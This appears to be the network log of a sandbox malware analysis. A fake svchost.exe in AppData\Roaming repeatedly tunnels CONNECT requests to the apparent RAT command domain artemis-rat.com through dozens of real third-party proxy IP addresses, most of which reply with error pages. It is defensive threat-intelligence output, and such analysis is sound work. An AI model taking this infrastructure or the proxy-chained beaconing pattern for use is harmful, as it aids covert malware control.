                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2794192.168.2.559182162.159.242.1598043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.781481028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.943659067 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2795192.168.2.55905580.67.8.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.787033081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2796192.168.2.559009144.24.122.468043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.796230078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.645946026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.411675930 CET805INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2797192.168.2.559072119.28.4.112999943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.799066067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.115717888 CET756INHTTP/1.1 500 Internal Server Error
                                                                                    Server: nginx/1.17.4
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 579
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.17.4</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2798192.168.2.559077145.239.199.2418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.806766033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.117542982 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2799192.168.2.559066194.247.173.17808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.806828976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2800192.168.2.55908781.250.223.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.813447952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.126178026 CET805INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2801192.168.2.559022103.86.109.388043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.819396973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.240283012 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2802192.168.2.55909991.107.180.2508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.822287083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2803192.168.2.559170201.174.239.28415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.827078104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2804192.168.2.55662250.63.12.336146443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.846982002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.677073002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2805192.168.2.558444189.240.60.163909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.849903107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.296745062 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2806192.168.2.558317103.182.112.11500043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.855633020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.282378912 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2807192.168.2.55916220.210.113.328043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.857579947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.123990059 CET314INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: close
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2808192.168.2.559193192.154.244.92900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.858726978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2809192.168.2.55912394.177.106.178232443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.874588013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.216454983 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.22.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2810192.168.2.559214104.19.171.1888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.874926090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.029392004 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2811192.168.2.559132113.161.56.137312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.875063896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
